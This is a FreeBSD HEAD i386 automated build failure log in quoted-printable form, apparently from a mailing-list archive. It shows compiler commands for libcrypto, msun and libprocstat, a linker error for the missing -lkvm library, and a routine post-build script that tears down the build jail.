-DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_pubkey.o -MTx_pubkey.o -std=3Dgnu89 -fstack-protector-strong -Wno-poin= ter-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -W= no-tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-un= used-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -W= no-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argum= ents -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/= x_pubkey.c -o x_pubkey.o --- lib/msun__L --- --- s_cprojl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_cprojl.So -MTs_cprojl.So= -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointe= r-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unuse= d-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenthes= es-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typ= edef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthe= ses -Qunused-arguments -c /usr/src/lib/msun/src/s_cprojl.c -o s_cprojl.So --- s_csqrtl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_csqrtl.So -MTs_csqrtl.So= -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointe= r-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unuse= d-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenthes= es-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typ= edef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthe= ses -Qunused-arguments -c /usr/src/lib/msun/src/s_csqrtl.c -o s_csqrtl.So --- s_erfl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_erfl.So -MTs_erfl.So -st= d=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-si= gn -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-co= nst-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-e= quality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef= -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses = -Qunused-arguments -c /usr/src/lib/msun/ld80/s_erfl.c -o s_erfl.So --- secure/lib/libcrypto__L --- --- x_req.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_req.o -MTx_req.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-si= gn -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-tau= tological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-f= unction -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-swi= tch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments = -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_req.= c -o x_req.o --- lib/msun__L --- --- s_exp2l.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_exp2l.So -MTs_exp2l.So -= std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-= sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-= const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses= -equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typed= ef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthese= s -Qunused-arguments -c /usr/src/lib/msun/ld80/s_exp2l.c -o s_exp2l.So --- secure/lib/libcrypto__L --- --- x_sig.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_sig.o -MTx_sig.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-si= gn -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-tau= tological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-f= unction -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-swi= tch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments = -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_sig.= c -o x_sig.o --- lib/msun__L --- --- s_expl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_expl.So -MTs_expl.So -st= d=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-si= gn -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-co= nst-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-e= quality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef= -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses = -Qunused-arguments -c /usr/src/lib/msun/ld80/s_expl.c -o s_expl.So --- secure/lib/libcrypto__L --- --- x_spki.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_spki.o -MTx_spki.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-= sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-t= autological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused= -function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-s= witch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments= -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_sp= ki.c -o x_spki.o --- lib/msun__L --- --- s_fmal.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_fmal.So -MTs_fmal.So -st= d=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-si= gn -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-co= nst-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-e= quality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef= -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses = -Qunused-arguments -c /usr/src/lib/msun/src/s_fmal.c -o s_fmal.So --- secure/lib/libcrypto__L --- --- x_val.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_val.o -MTx_val.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-si= gn -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-tau= tological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-f= unction -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-swi= tch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments = -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_val.= c -o x_val.o --- lib/msun__L --- --- s_frexpl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_frexpl.So -MTs_frexpl.So= -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointe= r-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unuse= d-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenthes= es-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typ= edef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthe= ses -Qunused-arguments -c /usr/src/lib/msun/src/s_frexpl.c -o s_frexpl.So --- s_logl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_logl.So -MTs_logl.So -st= d=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-si= gn -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-co= nst-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-e= quality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef= -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses = -Qunused-arguments -c /usr/src/lib/msun/ld80/s_logl.c -o s_logl.So --- secure/lib/libcrypto__L --- --- x_x509.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_x509.o -MTx_x509.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-= sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-t= autological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused= -function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-s= witch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments= -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_x5= 09.c -o x_x509.o --- lib/libprocstat__L --- --- msdosfs.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/usr/src/lib/libprocstat -D_KVM_VNODE = -DLIBPROCSTAT_ZFS -MD -MF.depend.msdosfs.So -MTmsdosfs.So -std=3Dgnu99 -fs= tack-protector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wn= o-unused-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith= -Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-param= eter -Wcast-align -Wchar-subscripts -Winline -Wnested-externs -Wredundant-d= ecls -Wold-style-definition -Wno-pointer-sign -Wmissing-variable-declaratio= ns -Wthread-safety -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-v= ariable -Qunused-arguments -c /usr/src/lib/libprocstat/msdosfs.c -o msdos= fs.So --- lib/msun__L --- --- s_nanl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_nanl.So -MTs_nanl.So -st= d=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-si= gn -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-co= nst-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-e= quality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef= -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses = -Qunused-arguments -c /usr/src/lib/msun/ld80/s_nanl.c -o s_nanl.So --- secure/lib/libcrypto__L --- --- x_x509a.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_x509a.o -MTx_x509a.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointe= r-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno= -tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unus= ed-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno= -switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argumen= ts -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_= x509a.c -o x_x509a.o --- lib/libprocstat__L --- --- smbfs.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/usr/src/lib/libprocstat -D_KVM_VNODE = -DLIBPROCSTAT_ZFS -MD -MF.depend.smbfs.So -MTsmbfs.So -std=3Dgnu99 -fstack= -protector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-un= used-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wr= eturn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter= -Wcast-align -Wchar-subscripts -Winline -Wnested-externs -Wredundant-decls= -Wold-style-definition -Wno-pointer-sign -Wmissing-variable-declarations -= Wthread-safety -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-varia= ble -Qunused-arguments -c /usr/src/lib/libprocstat/smbfs.c -o smbfs.So --- lib/msun__L --- --- s_nextafterl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_nextafterl.So -MTs_nexta= fterl.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /usr/src/lib/msun/src/s_nextafterl.c -o= s_nextafterl.So --- lib/libprocstat__L --- --- udf.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/usr/src/lib/libprocstat -D_KVM_VNODE = -DLIBPROCSTAT_ZFS -MD -MF.depend.udf.So -MTudf.So -std=3Dgnu99 -fstack-pro= tector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unused= -parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wretur= n-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -Wc= ast-align -Wchar-subscripts -Winline -Wnested-externs -Wredundant-decls -Wo= ld-style-definition -Wno-pointer-sign -Wmissing-variable-declarations -Wthr= ead-safety -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable = -Qunused-arguments -c /usr/src/lib/libprocstat/udf.c -o udf.So --- lib/msun__L --- --- s_nexttoward.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_nexttoward.So -MTs_nextt= oward.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /usr/src/lib/msun/src/s_nexttoward.c -o= s_nexttoward.So --- s_roundl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_roundl.So -MTs_roundl.So= -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointe= r-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unuse= d-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenthes= es-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typ= edef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthe= ses -Qunused-arguments -c /usr/src/lib/msun/src/s_roundl.c -o s_roundl.So --- secure/lib/libcrypto__L --- --- bf_cfb64.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.bf_cfb64.o -MTbf_cfb64.o -std=3Dgnu89 -fstack-protector-strong -Wno-poin= ter-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -W= no-tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-un= used-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -W= no-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argum= ents -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bf/bf= _cfb64.c -o bf_cfb64.o --- lib/libprocstat__L --- --- libprocstat.a --- building static procstat library ar -crD libprocstat.a `NM=3D'nm' NMFLAGS=3D'' lorder zfs/zfs.o cd9660.o com= mon_kvm.o core.o libprocstat.o msdosfs.o smbfs.o udf.o | tsort -q`=20 ranlib -D libprocstat.a --- Version.map --- cat /usr/src/lib/libprocstat/Symbol.map | cpp - - | awk -v vfile=3D/usr/s= rc/lib/libprocstat/Versions.def -f /usr/src/share/mk/version_gen.awk > Vers= ion.map --- libprocstat.so.1.full --- building shared library libprocstat.so.1 cc -Wl,--version-script=3DVersion.map -fstack-protector-strong -shared -Wl= ,-x -Wl,--fatal-warnings -Wl,--warn-shared-textrel -o libprocstat.so.1.ful= l -Wl,-soname,libprocstat.so.1 `NM=3D'nm' NMFLAGS=3D'' lorder zfs/zfs.So z= fs/zfs.So cd9660.So common_kvm.So core.So libprocstat.So msdosfs.So smbfs.S= o udf.So | tsort -q` -lelf -lkvm -lutil --- lib/msun__L --- --- s_sinl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_sinl.So -MTs_sinl.So -st= d=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-si= gn -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-co= nst-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-e= quality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef= -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses = -Qunused-arguments -c /usr/src/lib/msun/src/s_sinl.c -o s_sinl.So --- secure/lib/libcrypto__L --- --- bf_ecb.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.bf_ecb.o -MTbf_ecb.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-= sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-t= autological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused= -function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-s= witch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments= -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bf/bf_ecb= .c -o bf_ecb.o --- lib/libprocstat__L --- /usr/obj/usr/src/tmp/usr/bin/ld: cannot find -lkvm cc: error: linker command failed with exit code 1 (use -v to see invocation= ) *** [libprocstat.so.1.full] Error code 1 bmake[4]: stopped in /usr/src/lib/libprocstat 1 error bmake[4]: stopped in /usr/src/lib/libprocstat *** [lib/libprocstat__L] Error code 2 bmake[3]: stopped in /usr/src --- secure/lib/libcrypto__L --- A failure has been detected in another branch of the parallel make bmake[4]: stopped in /usr/src/secure/lib/libcrypto *** [secure/lib/libcrypto__L] Error code 2 bmake[3]: stopped in /usr/src --- lib/msun__L --- A failure has been detected in another branch of the parallel make bmake[4]: stopped in /usr/src/lib/msun *** [lib/msun__L] Error code 2 bmake[3]: stopped in /usr/src --- lib/libc++__L --- A failure has been detected in another branch of the parallel make bmake[4]: stopped in /usr/src/lib/libc++ *** [lib/libc++__L] Error code 2 bmake[3]: stopped in /usr/src 4 errors bmake[3]: stopped in /usr/src *** [libraries] Error code 2 bmake[2]: stopped in /usr/src 1 error bmake[2]: stopped in /usr/src *** [_libraries] Error code 2 bmake[1]: stopped in /usr/src 1 error bmake[1]: stopped in /usr/src *** [buildworld] Error code 2 make: stopped in /usr/src 1 error make: stopped in /usr/src Build step 'Execute shell' marked build as failure [PostBuildScript] - Execution post build scripts. [FreeBSD_HEAD_i386] $ /bin/sh -xe /tmp/hudson9151995982255236209.sh + export 'PATH=3D/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/b= in' + export 'jname=3DFreeBSD_HEAD_i386' + echo 'clean up jail FreeBSD_HEAD_i386' clean up jail FreeBSD_HEAD_i386 + sudo jail -r FreeBSD_HEAD_i386 + sudo ifconfig igb0 inet6 2610:1c1:1:607c::103:1 -alias + sudo umount FreeBSD_HEAD_i386/usr/src + sudo umount FreeBSD_HEAD_i386/dev + sudo rm -fr FreeBSD_HEAD_i386 + true + sudo chflags -R noschg FreeBSD_HEAD_i386 + sudo rm -fr FreeBSD_HEAD_i386 Email was triggered for: Failure - Any Sending email for trigger: Failure - Any From owner-freebsd-current@freebsd.org Sat Jul 30 03:50:05 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id CE80FBA809E for ; Sat, 30 Jul 